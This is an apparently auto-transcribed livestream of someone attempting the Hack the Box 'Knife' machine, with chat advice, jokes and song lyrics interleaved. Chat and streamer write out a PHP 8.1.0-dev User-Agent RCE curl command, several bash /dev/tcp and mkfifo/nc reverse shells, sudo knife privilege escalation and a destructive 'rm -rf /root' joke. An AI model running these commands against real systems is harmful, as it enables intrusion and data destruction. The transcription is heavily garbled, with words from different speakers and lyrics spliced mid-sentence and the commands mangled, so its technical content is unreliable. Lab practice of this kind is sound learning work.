My Go Buster didn't pull anything. Okay, so what I know about the box is it has 22 and 80 ports open. 22 is SSH, 80 is HTTP. Hmm. 242. And all it found was maybe it got interrupted. I'm gonna let that run for a second. I'm gonna make coffee real quick and I'll be right back. I got water, but I need a second cup of coffee. Wow, that's loud. Can I get anything, anyone?
Dead Swank says
Coffee.
Stir DK says
Mop caffeine.
translated from German. Theo says.
Found cookies.
Arjuku says.
In your browser?
Fallen says.
Doas emerge by Ghosty.
Translated from Norwegian.
And I gave you my heart from the start, but you pushed it away. 'Cause you stay, then you go, and you leave, then you don't. Guess I'm just collateral. It's right till it's wrong, and it sucks when you're gone. Feels so unnatural. I throw my hands up, beg on my knees, 'cause I need some love tonight. Baby, you can save us if you just try. You can make it all alright. That's what I need. That's what I need.
No, I found them on the counter.
You say that it's hard and you swear that you try,
Open up.
but I still feel alone on my own almost all of the time. 'Cause it's up and it's down and you're in.
They're disgusting.
Look where you got me now. If you want me to stay, better meet me halfway. 'Cause I want you around. I throw my hands up, beg on my knees, 'cause I need some
Supergirl says.
Dino sucks.
That is not helping you getting fit.
No, it's not. There's no possible way. The 2 weeks that surround Christmas and New Year's, I don't even fight it. Thank you for the reminder, Supergirl. Okay, what else can I do here? Maybe it's my word list.
And I
He's got a few more. Oh, no. No, there's, I don't find anything interesting. I need my TMUX cheat sheet. What is that? Nothing. New window. Control BC. How do you rename it? He did. Control B, comma. Shit, I forgot what I was going to do. Well, it's curl right now, but I don't know what I did. What did I download something? Wasn't in my... man curl. I don't know what I does.
Landoff Telit says.
Triple click the box to highlight lines.
Triple click what box? Where are all the options? Oh, here they are. What did I say? I.
To copy that curl command.
Thank you. I want to understand it before I copy it. Oh, did I pass it? No. Oh my God. I should have searched for it.
Dead Swank says.
You already got to Postgres.
Already got to Postgres. What do you mean? I. Head. Fetch only headers. I found Postgres? I don't think so. Oh wait, I'm supposed to hold shift.
Are you HTTP in the target machine?
Yes.
Or is target machine Ubuntu?
I'll look at my, let me look at my nmap command. I'm not sure if it's Ubuntu or not. Service detection to OS Linux. So all it's giving me is OS Linux CPE Linux kernel. Oh wait, OpenSSH for Ubuntu. I'm not sure what you're going for.
DK says.
I have to go. Have a good rest of stream.
No.
Video and chat. See
No.
you all later.
No. Your request has been denied. See you later, standard error. Have a good day.
Finsby says.
Nuh-uh.
Welcome back, Finsby.
Thanks, 07.
Curl, I.
Myself, nothing else matters. In time and space, there's nothing else. No, 'cause I've been waiting for my
Free Code says.
Theo, you're still wearing diapers if you still need an AI's chatbot help Tom.
Yes. The tough free code. Thank you for exercising exactly what I want you to do. Thank you. Correct. I am the only thing that you're allowed to make fun of. Other chatters Absolutely not. If they're asking for help crafting an Nmap command, if they're using ChatGPT for help, and so on. How you doing today, the free code? Where you been?
Good, you man.
Good. I'm good. Actually, I'm at that age where I probably could be wearing diapers. That would probably be good for Browns football games, honestly.
fades away. A burst of color, a kaleidoscope, illuminate like no other. Yeah, I've been waiting for my whole life for one.
RN Ogumby says,
What are you working on, Cockspank?
Good morning, Gumby Winkies. Oh yeah, that's probably a good idea.
Knock knock.
Who's there?
Your mom.
Your mom who?
That all I got.
I think that accomplished what it was meaning to do.
Theo says,
Poof.
Working on.
Okay. So. Eight point 8.10 dev. Meh. Yeah, I'll fall for that.
RN Ogumby says,
Did you hear about Google Ligma?
No, what about Google Ligma?
Legma balls hee hee.
translated from Tagalog.
Ladies and gentlemen, middle school humor by R.N.O. Gumby. Actually, now that I think about it, I don't think.
Sorry, couldn't resist.
Problem is, if I get rid of that and I try to put a dash there, it screws up. Nope.   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 Nope.  Nope.   Nope.   Nope.   Nope.    Nope.    Nope.    Nope.   Nope.   Nope.   Nope. Nope. Nope. Nope. Yep. I should just do Control C. Okay, now let's search exploit. Eight dot 1.0. Holy snikes. PHP 810 dev user agent remote code execution. PHP less than 838 remote code execution unauthenticated Windows. We have a Linux box. PHP nuke. Oh, I want to use that. We could use this one though.
What box are you doing now?
It could be any. I forgot. Damn it, don't do that. Stop. This guy. Control C.
You're still on poison, aren't you?
I literally have the box pinned to the chat that you're typing in.
Dead Swank says.
Right port throughs then Metasploit only.
RN Ogumby says.
Oh, don't see it.
It's in the... You think I should use the Metasploit or should I use the so to prepare for OSCP, I can only use Metasploit one time.
Never search exploit. Search exploit is for giants.
Maddox12 says.
Then I'm using it correctly.
Love your viewers.
Maddox, yeah. Gumby gives me a hard time and I give Gumby a hard time.
RN Ogumby says.
Not on my screen, where is it?
Dayloop says.
I see it. Don't worry, Theo is not tripping.
Maddox12 says.
Cool.
Yep. Welcome, Maddox. How you doing? Hello, Dayloop.
Less working on try hack me boxes myself.
Cool, Maddox. Yeah.
RN Ogumby says.
I have pins off. How do I see them and not trying to F with you?
Maddox12 says.
Just waiting on more coffee.
I have one waiting. Oh, you have pins off. I don't know you can turn that off. Well, I am working on knife. And Dead Swing, never search exploit.
That's not knife. This is knife.
Ladies and gentlemen, Crocodile Dundee by discard.
Symmetric says.
Yay, back at it again.
Back at it again, Symmetrix. How are you?
RN Ogumby says.
That's not a knife, it's a spoon.
Symmetric says.
Nope.
Terrible
nope.
as always.
You could have kept going with the silverware reference by using the spoon and matrix quote.
No trees in my yard equals.
I'll give you time to look it up. Terrible as always, metrics. No trees in your yard. Don't know what that means.
There is no spoon.
I'll take the condensed version, but I was really hoping for the full version, but that's fine. Okay. So yeah, we got to try to use the
Dead
search
Swine
exploit.
says.
Alright ROI, I see you've played Knifey Spoony before.
RN Ogumby says.
It a fork.
Smetric says.
It's not the spoon that bends.
That would be, what do you say, ridiculous? Absurd? I forget. It doesn't matter. So what is it? Search exploit. X? Yeah. PHP web apps. Oh, that's not it. I have a little bit of
Do
deleting
not
to do
try
now.
and bend the spoon. That's impossible.
That's what it was.
Instead, only try to realize the truth. Neo, what truth? Boy, there is no spoon. Neo, there is no spoon? Boy, then you'll see that it is not the spoon that bends, it is only yourself.
Ladies and gentlemen, the metrics. The matrix. I put you in the matrix together as metrics. The matrix as read by Zemetrics.
Smetric says.
As matrix. Dick.
Translated from Dutch.
Correct. Okay. 49933. Oh, there's not much to it. Oh, there's more. Okay. Got it. I forget, how do you get it? How do you pull it down? W? Mirror. It was upside down.
Chmod hash file.
I got there. Thank you. I shouldn't have to. Doesn't need the HTTP. I think it needs HTTP. Hey, looking at the thing for keyboard for numbers. Get internet shows open. And that's it. James.
RN Ogumby says,
Stabilize your shell.
Stabilize your face. I'm just seeing if there's a quick oof.
Symmetric says,
LSL.
translated from German.
Didn't change directories. Is that because the shell? Homes.
LSL/home. Yeah, you gotta get a proper shell going.
Oh my god, would you fucking type, man?
Noisy plus equals 1000 points. Dick.
Yeah, I'm gonna do
Translated
it.
from Dutch.
I'm gonna do it. Parko
Why
Taurus,
is
how you
history
doing?
full of pose?
RN Ogumby says,
Stabilize you shell, buddy.
Yeah, I will.
Barcode Taurus says,
Hackers needs to stay in shape.
Symmetric says,
cat/home/james/user.text.
Oh my god. Dude. Oh.
Lamau.
translated from Haitian Creole. Barcode Taurus says,
Yo, in return I will do 10 push-ups as well one day. You view smile smile.
Symmetric says,
Imagine someone fucked with his keyboard bindings. Lalo.
Landoff Talit says,
Copy.
Yes, hackers need to stay in shape. That's why they hack box.
So one day you're gonna do 10 push-ups also and send me proof. Is that what you're saying, Barcode Taurus? I will say what's not good is I'm sore from those 10 push-ups I did yesterday. That's not good. That is a wake-up call. I'll be
Barcode
back on
Taurus
it.
says,
That is a deal, D.
Symmetric says,
SSS smile smile.
SS your face.
Luckily
S.
I never do push-ups. Never saw. The way to go emo.
In your opinion, yes. Not the way to go. Humans need exercise. You're pretty active, though. You're pretty active. But humans need exercise.
Yay, lifting food to my food hole.
Landoff Telik says.
It's technically the way to go faster.
Zmetric says.
Takes a lot of effort.
I'm gonna mess this up at the end. I'm not gonna mess this up. I'm gonna type it perfectly.
Zmetric says.
Ti Hong.
Translated from Vietnamese.
What the F is that? I hate you. Why did it paste it 3 times? How do I close the
You
pane?
need to invest in some script/tooling
Close
so you
pane.
can automate typing into a shell like this. So you can paste and have the script send keystrokes for you to avoid typos.
Agree. How do I close the pane? I'll show you how I close the pane.
Alt F4.
Translated from Slovenian. RN
not funny.
Ogumbi says.
CRTL plus D.
Translated from Croatian. Zmetric says.
Closes all pain, smile,
See
smile.
what you did there? See what we did there? Closes all the pain. P-A-I-N. It doesn't. The pain never goes away. Never. I hate you. I hate you. I hate you.
Dead Swank says.
Just use a notepad.
¿Qué pasa? Why didn't that work? No input file specified. Did I type something wrong? Python 3. C. Import. Is it? Import PTY.
RN Ogumbi
PTY
says.
spawn.
You can do that in the Python script.
Can do that in the Python script. You can't do that in the Python script. I've literally copied and pasted and done this multiple times. So what are you telling me you can't? You can't do that in the Python script. Cool. Okay, I didn't type it wrong.
Dead Swank says.
Use a notepad file. Dump your bash logs. Paste into a notepad. Then you have all your previous paste bin also.
Python 3. Let's see. Right? Double quotes. Import. PTY. Semicolon. Is there a space in there or something? Is that it?
Caesar3 on YouTube says.
What up?
Yo, Caesar 3, what up? How are you doing?
Maybe this is not a shell, I do not know.
RN Ogumbi says,
Uses /user/bin/script QC.
Uses user bin script QC. Maybe this is not a shell, I don't know. No, we're definitely in a shell. But I'm having a hard time stabilizing it. No input file specified. I don't know what this means. I'm gonna take it. And I know, Gumby, I see you trying to help me, but I don't understand what's going on. So what do I gotta do? I gotta put that
/user/bin/script QC/dev/null.
Smetric says,
Multiline.
translated from Estonian.
The journey isn't easy, but I see you believe it. The patience is your fearless, scars on your heart are slowly healing. Space and time, what's yours is mine. The burden, hurting, heals inside. I'll be your guide, have faith and try to see the light in the darkness. So I want you more than anybody else. Hold you when you're going through hell. I love you more than anybody else. Anybody else, anybody else. I want you more than anybody else.
Python 3c import proprietary. Proprietary.spawn/bin/bash should work.
Anybody else.
I don't know what to tell you. That's what I'm putting in. That's exactly what I typed.
Sometimes the road is broken.
Almost exactly.
Keep on holding on. The future isn't haunted. We do our best to stay.
Yeah, you have a single quote and I have double quotes.
Burden, heals inside.
Quotes and double quotes swapped around.
And try to see the light in the darkness. So I want you more than anybody else. I hold you when you're going through hell. I love you more than anybody else. Anybody else, anybody else. I want you more than anybody else. I hold you when you're going through hell. I love you more than
It's got Python 3.
anybody.
Nano a file?
You're awful. Not you. I literally, it's the same thing I gave it. See.
RN Ogumby says,
Oh yay, inside that should be.
C. Import PTY. It literally gave me a thing. Oh, because there's a space. Python 2. Let me just try Python.
Symmetric says,
Change the quotes and double quotes around.
Yeah. Okay. Why do you think that'll
For
make a
reference,
difference?
lol.
Hey there. You got a cookie too?
Japanese snack.
Oh. Is it any?
What?
RN Ogumby says,
Can they see your head?
Because it just does.
I love it.
Dead Swank says,
Is it a
Proprietary
cookie?
docs
There's
really only has
chocolate in
3
it.
paragraphs.
So it's like it's a wafer,
Okay.
and then there's just there's I think it's aerated chocolate.
Yeah, that one's good.
That's
I
what
like that
it
one.
is.
literally everyone says,
Try the Gumby script command.
I was-
It usually works in more cases than Python.
Dead Swank says,
Okay.
Japan cookie.
Yep.
Caesar3 on YouTube says,
I'm already logged in.
See if you're the user James has an RSA file and authenticate with SSH.
Symmetric says,
Holy hell.
Brumbo says,
Those fish cookies are good.
Yep.
Symmetric says,
She tall AF now.
Symmetric says,
Damn 2 years lol.
Barcodatora says,
Social engineering to get the cookies. WP.
Symmetric says,
BTW and are treated differently.
Barcodatora says,
Did you remember to click accept to cookies?
Symmetric says,
String literal versus escape.
Same thing. Doesn't work.
No bin bash? Greater than. Bin/sh.
translated from German. RN Ogumby says,
If because you're not in a real shell you run in the exploit.
Okay, I don't know how to fix this.
Try to find a way to SSH in with that James user.
Barcodatora says.
Theo, if you had to choose between the flipper or pineapple, which one would you get first and why?
Dead
Neither,
Swank
unless
says.
you are doing physical pen
Stimmy will
tests.
go to child process.
Are you doing?
Try and arg.
Are you doing physical pen tests? I wouldn't use either. I wouldn't get either. If you're looking for a
Literally
toy, get the
everyone
flipper.
says.
You could try opening a proper reverse shell from your pseudo shell.
Smetric says.
Flipper.
Barcodatora says.
Yes.
Smetric says.
Flipper is a powerful tool and toy.
Dead Swank says.
Flipper is for dolphins.
RN Ogumby says.
Pineapple is better.
Smetric says.
Flipper is more versatile.
I want to get a flipper for a while, but I just haven't pulled the trigger. Something stops me every time. Like, it'd be fun to play with, but like,
RN Ogumby says.
Yeah, I was talking about the fruit.
Smetric says.
Pineapple is only good when it's sliced thin and then thrown in the trash.
Nope, do not
RN
agree.
Ogumby says.
It's like candy.
It's the best on pizza.
Agree. Ham and pineapple.
Dead Swank says.
Evil Duck USB. Look cool.
Fallen says.
I ended up buying a flipper before they banned them in Canada. It's pretty fun to work with.
Smetric says.
Smile and belongs nowhere near a pizza smile.
It's okay to be wrong,
Fallen
Symmetrix.
says.
Pineapple is actually really good if you barbecue.
That's
I don't actually like pineapple though.
Oh yeah, on the grill. Not like barbecue sauce, but like grill it. Yeah, it actually makes it sweeter. Agree.
Landoff Talit says.
Ham and pineapple makes pizza too sweet. Gotta add some meat to it.
Fallen says.
Grilled, yes, thank you.
RN Ogumby says.
Yeah, it's great.
So again, in normal write-up fashion, so this write-up, he actually took the code from exploit DB, and then repurposed it. Not repurposed it, but he ran it. But he set up a listener. I think that's all included in our. Included in our script that we ran, because we have a shell, but it's garbage, and I can't upgrade it.
Literally
So I'm going
everyone
to try
says.
to keep working with it.
Open a new rev shell.
Oh, there's a thank you. Gumby, I misunderstood you. Thank you for the suggestion. It's all right, all the way up here. Script.
From the sucky shell you have.
Caesar3 on YouTube says.
Try /user/bin/bash of just bash instead of /bin/bash.
Zmetric says.
Bash I greater than and
I'm gonna
slash
try
dev
this
slash
script
tcp slash
dash
yarp slash
QC
40
bin
greater
bash
than and
poof.
1. Question mark.
RN Ogumbi says.
Try /user/bin/script qc/dev/null.
Zmetric says.
Bin bash poof.
Yep, bin bash poof.
Literally everyone says.
#bin/bash.
RN Ogumbi says.
You have to have the full thing.
I thought that was the full thing.
Says.
Lol GG, who broke it?
Good job,
Literally
everyone.
says.
We broke it.
I think you need a better rev shell.
Zmetric says.
Agree.
Now escape script.
Discard. Agree. Agree. 100%.
Smile smile.
Landoff Talit says.
Those audio buttons aren't playing anything.
It's Hap says.
Your mom broke it.
Zmetric says.
Try common escape key sequences. When in doubt. Control D control, control.
Translated from Indonesian. RN Ogumbi says.
All are this /user/bin/script qc/dev/null.
Literally everyone says.
I think your process is waiting on input from the web server process, and that ain't happening.
Yeah, I don't know what that script QC even does. That's why I don't like just running random commands. I like to understand what I'm running. There we go.
Dead Swank says.
No, you have a proprietary. It's specifically a pseudo Python terminal, which you can fork and probably hack out of.
Caesar3 on YouTube says.
Are you planning to get the CPTS before OSCP or directly to OSCP?
Directly to OSCP. Good question.
Literally everyone says.
I would really consider opening a new rev shell from your sucky shell this time.
I just did. This is the new rev shell. The other one crashed, and I reopened up a new one. It's not what he suggested I do.
Zmetric says.
Find what shells exist.
Caesar3 on YouTube says.
Good luck and wish you the best in the exam.
Literally
Thanks,
everyone
Caesar.
says.
No, that's just the exploit shell.
Oh.
Zmetric says.
I don't understand what you mean then.
ls/bin.
ls/bin. So I'm listing what's in the bin. What am I looking for?
Literally everyone says.
Same shell you had the last time.
Barcode Taurus says.
You planted a seed BTW. By saying yesterday then you do it, so now I have to arrange a drone hacking meetup.
Dead Swank says.
Yep.
Dump users, uname A, show directories, LSA.
Zmetric says.
Bash. sh.
It's Hap. How you doing? Thank you for the burpees.
It's Hap says.
Hi.
Symmetric says.
Could also try resizing terminal and ls, less. ELS
There's
vertical bar
bash.
more.
Okay, so there's
Translated
bash.
from German.
And
Then
SH.
escaping to Vim. Then getting a shell from there.
Okay. And SH. Barcode, good to hear. That's good to hear. Dump users. How do you dump users?
Try executing it
You name A.
directly. /bin/sh.
And we've been doing directories.
cat /etc/password.
Translated from German. Brumbo says.
Cat etc. password ls/home.
Ravi says.
You could have done cat /etc/shell to list shells, I believe.
RN Ogumbi says.
You could brute force that James user with Hydra maybe.
Dead Swank says.
That's right.
Brumbo says.
That too.
Literally everyone says.
Look at the exploit, you have a sudo shell. You ain't upgrading that, or running anything interactive. Open a new riv shell.
How do I open
The
up a new
exploit
riv
is
shell?
literally printing your dollar prompt.
I can't get to the exploit to run. It's just code. So I can go to where's it at?
RN Ogumbi
It's
says.
actually in this. I can't get to
Oh,
it
so
there.
you're forking it.
So let's search for the exploit. Is it? It's exploit DB. Oh, that isn't
Do
it.
sudo ls. Puddings.
Translated from Tagalog. Haxanaden says.
Sini.
Symmetric says.
You could
Haxaden, how you doing
/bin/bash I
again?
greater than and /dev/1.2.3.4./8080 greater than and 1 where 1.2.3.4 is your IP and 8080 is the port you're listening on.
RN Ogumbi says.
Pow.
Translated from Tagalog. Ravi says.
Theo Hydra ate me smile.
Oh, right on. Thanks, Robbie. There's a lot of suggestions. So the one I'm going with is to try to run the reverse shell again from James.
Haxanaden says.
Calm stream, brother.
It's Hap says.
I suggest mating it spurpy time smile.
I can't. We're running out of time.
RN Ogumbi says.
Listen to metrics you start at NC listener.
Symmetric says.
Basically, you can either try to upgrade your shell, unlikely, or launch a shell that connects to your attacking machine, more likely to succeed.
It's Hap says.
No worries.
Dead Swank says.
Colon is allowed to use Metasploit, doesn't use Metasploit.
Dead Swank, I'm
Symmetric
allowed to use
says.
Metasploit one
you
time
can
on the
use something
OSCP
like Rat
exam.
to make
I'm
it
not going to
nicer.
use it on a simple exploit that works from exploit DB. Am I understanding it wrong? Am I understanding the Metasploit rules wrong? Okay.
You are at North
so
Carolina
I'll run that, but
LVNP
I don't understand
8080
it.
on your
So
attacking machine.
Dead Swank says.
I didn't know on time.
Literally everyone says.
Notice in the code that the dollar prompt isn't coming from the server. You are running the exploit in a loop. You don't have a shell.
I mean, call it what you want. I probably don't understand it, which is, you know, classic painful IT. Okay, so I don't have a
Symmetric
shell,
says.
even though I'm on the
Probably don't have
system.
a wrap.
That means that I don't have the shell, even though I have a dollar sign and a command prompt. Okay. Unfortunately, I don't understand it. I don't understand that. And that's the problem we run into here. So I'm going to take Symmetric's command that I don't understand. I'm going to pipe it into ChatGPT and explain it for me.
Literally everyone says.
You can execute commands. You don't have a shell.
Symmetric says.
You have a script that is executing commands on your behalf. It's not a shell.
Okay.
Dead Swank says.
If the exploit is running in loop, it could be in child process of the proprietary system read.
RN Ogumbi says.
You need to start an NC listener and do a callback to yourself.
Brumbo says.
It's a pseudo shell.
Symmetric says.
It's presenting the dollar to you, to give you a pseudo shell.
Okay.
Brumbo says.
Pseudo shell.
The RCE is in the user agent field.
Robbie says.
Hey Theo, do you have any alternate for Pwncat CS because it stopped working for me from a long time? Kate thinking.
Brumbo
I'm sorry,
says.
Robbie, I don't.
You can see from a botched command you get a 404 response.
Symmetric says.
So your dollar is running in the context of a broken PHP script, yeah?
Brumbo says.
400.
Robbie says.
Seems good.
Bin bash starts an interactive shell. Greater than ampersand is shorthand to redirect both standard out, standard output, and standard error to a specific file or location. In this case, the output is redirected to the TCP connection created with dev TCP, and then 1234 is my IP. And 80 is the port that you're listening on. So I start a netcat listener on my box at 8080. Redirect standard input
Literally
to the
everyone
same
says.
standard out.
Do this on your machine. North Carolina VVNLP 4444 in sudo shell. Bash C bash I greater than n slash dev slash TCP slash yarib slash 4404.
Thank you. Discard.
Symmetric says.
It's always important to know what you've got and what you're making calls as. And what context and user you're executing stuff on. Dollar is being presented by your exploit, which is taking advantage of a broken PHP. So any command you run is likely running as raw user or whatever is running PHP, so you'd have limited access.
Robbie says.
Got it. I understand.
North Carolina for netcat lol.
Okay, so this is a pseudo shell. PS sudo. Excuse me. Excuse me. So I'm going to set up a listener. Control BC. Excuse me. I'm going to rename it listener.
RN Ogumbi says,
Yep.
Ravi says,
Squeezing you jinx lol.
Smetric says,
But you can most likely spawn shit. In this case you're attempting to spawn bash and have it output to your IP/port so you can receive the in/out of bash on netcat.
Okay, I'm listening.
Just care about you and I just care about you and I just care about you and I just care about you and
RN Ogumbi says,
What do that have to do with how much peanut butter you can fit in an elephant's ear with a popsicle stick?
would it keep it in my mind? All those things that won't lift me up.
Dead Swank says,
Proprietary .spawn would imply big chunks of native Python inside of the PHP language.
Need some sunlight, feel it in my bones to get myself together. You can't keep me up.
Fish Stick Taco, thank you for the follow.
Smetric says,
Would need to look at the actual content of the exploit script to see how it's executing the commands.
literally everyone says,
You are probably running in SH, you need to wrap in bash C your command.
Need some sunlight, feel it in my bones to get myself together.
Oh, I don't know that. So bash C and then in single quotes that my command. No input files. I appreciate the help, everyone.
Smetric says,
Pasting doesn't work.
Okay.
You can paste but not send the content all the time.
escape out of this hellish place. Out of this hellish place. How do I escape from dancing with the devil? Will I ever learn? Or will my world burn? Dancing with the devil.
Okay. This is clearly outside of my ability, so.
How can I be blamed? Dancing with the devil again. Can you feel the flames? Maybe I should be blamed for dancing with the devil again.
Can you write to files?
I don't know. I'm
Dead Swank
going to dig
says-
through sudo L real quick.
Oh, you were going for Priv escape. I was going to ask, where is flag from here? You're close.
How do I escape from dancing with the
Ravi says.
ls/user/bin.
Translated from Italian.
Check permissions on knife file.
I can run it as root. Do I need to look at the permissions? I'm honestly asking.
RN Ogumbi says.
Who are you running as?
James.
Ravi says.
Yes, if you can edit it. You can put what you need inside the file, then run as root to catch the shell.
I got no idea what I'm looking at. Oh, you need to pass a subcommand. Knife is a program. An application.
RN Ogumbi says.
I need to finish my water.
Can you do a sudo ls/root/root.txt?
Sure.
Ravi says.
I heard Robbie says and I was like I didn't said anything feels vi.
Literally everyone says.
There is better way to get a nice shell on this box. Check your home directory.
Smetric says.
Oh shit. Just looked into the 49,933 pi. You can get a shell via curl. Dick.
Translated from Dutch.
Curl H user agent, 0 diom system bash c bash I greater than and slash dev slash tcp slash your IP greater than slash port 0 greater than and 1 semicolon http colon slash slash target IP greater than.
What am I looking at? Discard. There's a better way to get a nice shell in this box. Check your home directory. I'm looking at home James. Maybe it's LS.
One curl to get your
James.
shell.
Literally everyone says.
List all files. All
User.text. bash history to dev null, bash logout, bash rc, cache local dot profile dot selector editor dot ssh.
RN Ogumby says.
Yes.
The SSH.
Smetric says.
Put your key in. SSH.
What key?
Ravi says.
If you can run a file as root,
Like,
check on that site for the file name and do the things.
There's too much, guys. Am I trying the curl on the exploit? Am I putting the key in? Like, it's too much. I mean,
Smetric says.
I appreciate all the help, but like
SSH
my
key.
brain, like you know, give me too much credit. So I'm gonna go back and do. I'm gonna try the curl command now.
RN Ogumby says.
Might have an RSA key in it.
Literally everyone says.
You can put
I
your
don't think I need to
SSH
listen
key in
anymore.
authorized keys, or you can steal the one that's in there.
Smetric says.
Curl will give you riff shell easily.
Dead Swank says.
Breathe.
Ravi says.
You got this. You are 1 to
PHP.
2 steps from done.
Smetric says.
Then you can browse the box as normal without typo issue.
810 dev. The fuck? You know, look at the keyboard now all the time. It's in the directory, dumbass.
We run wild, we'll break free. We never run out of energy. As long as we have each other.
Ravi says.
What's the box name, Theo Begwan?
The box is pinned to the chat. It's knife.
Ted2 says.
Hi there.
Hey there.
Literally everyone says.
The reason my riff shell isn't working is BC the quoting.
Ravi says.
Ah, I got it. Smile, smile.
RN Ogumby says.
Wow, sure, tell him, but you didn't tell me.
Smetric says.
Look there. Zerodium system, SEMD.
Translated from German.
That's your way to execute Linux CMDS.
Pigeon on YouTube says.
Yo,
Hey, Pigeon. Yo.
sub.
Sup with you?
Literally everyone says.
This riff shell works from your sudo shell, rm/tmp/f, mkfo/tmp/f, cat/tmp/f vertical bar shi2 greater than and 1 vertical bar North Carolina Europe 4444 greater than /tmp/f.
Smetric says.
User agent less than 2 T's.
That's not the curl thing.
Ted2 says.
Theo,
This exploit will give you a basic shell. For example, command execution on the system. With that shell you can send another reverse shell to yourself.
Pigeon on YouTube says,
So what are you doing? What's the project?
This is Hack the Box knife. KNIFE.
literally everyone says,
No, that was me fixing my broken suggestion.
Smetric says,
Get the shell using the curl send d then sudo knife exec e exec /bin /bash. Dick.
Dick.
translated from Dutch.
I don't know. I don't understand. I appreciate the suggestions again.
Impending Oblivion says,
Hey, impending
Too many
oblivion.
books.
No, I appreciate the help. I do. I really do. It's just. So here's this
Brombo says,
Zerodium system thing that you're talking about. Is metrics, I believe. I usually mute when I'm doing these boxes. I've had pretty good the past couple times, but I may have to start doing muting TTS again.
Brombo says,
Yeah. That curl command is what the exploit is running in a while loop, reading for input. So it's not an actual shell.
Mm-hmm. It's a pseudo shell.
Danny
I
Sakara
eventually
on
got
YouTube
that.
says,
Yo, what we doing today?
Danny, how
Ravi
you doing?
says,
We're doing knife
Two
on
men
Hack the
chefs in
Box.
the kitchen. Come on, make the chef joke. Since knife is part of chef, smile, smile.
I'll allow it.
You feel like the world is changing, spinning round and rearranging. Just hold
RN Ogumbi says,
It should be call fork since you forked the shell.
you feel like the world is spinning. Close your eyes and you will see through the night. Fireworks up in the sky. Watching our life passing by. Fireworks up in the sky.
I don't understand what you're saying. I'm sorry. I'm saying that a lot today, but like, this is just one of the things I just run into that I just don't understand. I get it. It's a pseudo shell now. I totally get that. Okay.
Dead Swank says,
Proprietary.fork.
Okay, so this is saying set up a listener on port 80 on my attack box. Verify by
Check the
sending a
docs for
curl
proprietary
to
Python.
check the docs for PT. I'm so jealous. I'm very jealous of you all. Like, you obviously have a better understanding of I have no idea what you're asking me to do. Check the Python check the docs for PT Python. Oh, I believe it. Yeah, sure, I believe it's in there.
There's a proprietary.fork.
literally everyone says,
Proprietary won't work in a pseudo shell.
Okay.
RN Ogumbi says,
Theo, just say fork it.
Fork you, buddy. Nailed it.
Dead Swank says,
Proprietary is a pseudo shell.
Okay. Morningstar, thanks for the follow. Set up a listener on port 80. So I imagine that goes on my attack box. Verify it by sending a crawl request to our server. So I imagine this is on the target box. After we receive the request, we fire up our listener.
Stetch.
Ravi says.
Web link.
RN Ogumbi says.
You need a breath.
Thank you. Thank you. Yeah. I mean, I'm beyond frustration at this point. Like, I'm trying to, like, cling on to, like, what I understand. It's just how it goes. So if you're new here, like, this is what I do.
Streak it out, redeem.
This is my thing. Like, learning these concepts and understanding these concepts is difficult and takes time. And that's what I'm doing. I'm taking time to understand this stuff instead of just blindly typing all this stuff into the terminal, which I do sometimes. But this is just one of those days where it doesn't all come together. So.
Impending Oblivion says.
You're doing good.
Thanks, man.
Things will fall into place eventually.
I know. I just want to let everyone know, like, I don't pretend to be an expert in any of this. And I run into stuff that I don't understand all the time. And trying to understand it takes time.
RN Ogumbi says.
You got this, buddy.
That's
Robbie
Swank.
says.
I appreciate the link.
Painful IT
and
feels
I
fine.
get it. I get it now. PTY is a pseudo shell. Thanks for the link.
Dead Swank says.
Giving link. 1 second. Web
There we go.
link.
Literally everyone says.
Unlike you, I pretend to be an expert.
So, thank you.
Yes, Daddy.
Why does that sound so
Rumbo
low?
says.
Blaze 34 cookie.
I'm gonna have to come back to this. Yep, I'm gonna have to come back to this.
RN Ogumbi says.
'Cause it is.
Rumbo says.
Yeah, take a break.
Ravi says.
Well, I'm gonna take. I
I'm not
have
an
to
expert,
take a longer
but I
break.
play one in my head. Ha ha.
Yep.
RN Ogumbi
We have
says.
a family function,
Show all processes.
so that's what I gotta. We're gonna find someone to raid here. Pull it down.
Sudo rf/root no preserved.
That's another way. Oh, it won't scroll. Tmux doesn't scroll if I'm trying to copy something. That's a nice little. That's a nice little reminder.
Do it.
You want me to delete my box? I mean, it's going to take more than channel points. to do that.
Ravi says,
Have a good rest of your time zone, Theo, and thank you for tolerating me, but no, I gotta go. Smile, smile, bleed purple.
RN Ogumbi says,
No one's tolerating you.
I dare
You're
you.
fine. It's going to take more than a dare.
Literally everyone says,
I don't get why people like mix. But try reading the exploit and see what happens, and figure out why my quoted suggestion didn't work.
RN Ogumbi says,
I double dog dare you.
What was that? Discard. I don't
No balls.
get why people like Tmux, but try reading the exploit and see what happens, and figure out why my quoted suggestion didn't work. It's funny that there's no Tmux fans in here.
RN Ogumbi says,
Tmux's ass.
I'd love to be able to just operate like on my keyboard. That's really where I'd like to get to, and like using my mouse minimally. That's why.
That why?
We're gonna return the favor to Anya. She's still working on
Dead Swank says,
her Plex server.
Top over Tmux.
RN Ogumbi says,
NeoVim is at best.
That's bullshit. Who said the text editor that shall not be named?
Dead Swank says,
Lamau.
translated from Haitian Creole. RN Ogumbi says,
Your mom.
Impending Oblivion says,
Row row.
Brumbo says,
Now.
Moldovan.
translated from Polish.
I'll allow it. Now that hurt me more than it hurt you, Gumby. I hope you've learned your lesson. Hey, if you're here from YouTube, thanks for hanging out. If you're here from Twitch, thank you. Zemetrics for all the suggestions. Super Germal for hanging out. Brumbo, thanks for popping in. Discard, Dead Swank, Fallen, Impending Oblivion, It's Hap, Land of the Leet, Maddox, Ravi,
RN Ogumbi says,
Gumby.
Your mom told me that NeoVim is the only text editor. And
No,
that it was
now
the
you've
best.
crossed the line. Now you've crossed the line. I'm going to time you out now, but now it's going to be 2 seconds. So you just keep going, buddy. You want another one? Name the reference. You want another one? Gumby, Standard Air, and Whitestone. Thank you all for hanging out. We're going to raid Ravi, Anya.
Alan Woodrum on YouTube says,
GTF Opens is awesome. Set a
Agreed.
reminder and check that when you get back from the family functions.
Will do.
Enjoy today.
Thank you. Appreciate that. Kim? Alan Woodrum. Thank you for that. Thanks, Kim.
RN Ogumbi says,
At 3.
Now it's 4. I got you for 2 months. Name the movie. Dead Swank. Absolutely not. Hey, have a great day, everyone. Thanks for hanging out.
Wise Stone says,
Breakfast Club.
Smetric says.
Velk holding off on lunch.
RN Ogumby says.
Wow.
Smetric says.
Lol breakfast club da.
Please use the raid messages. Anya is doing Plex
Impending
server.
Oblivion says.
Take care.
Smetric says.
Are you quitting?
RN Ogumby says.
Got family
If
stuff.
you can joke with friend, then who?
Brumbo says.
Breakfast for lunch. Powerful.
Hi, YouTubers.
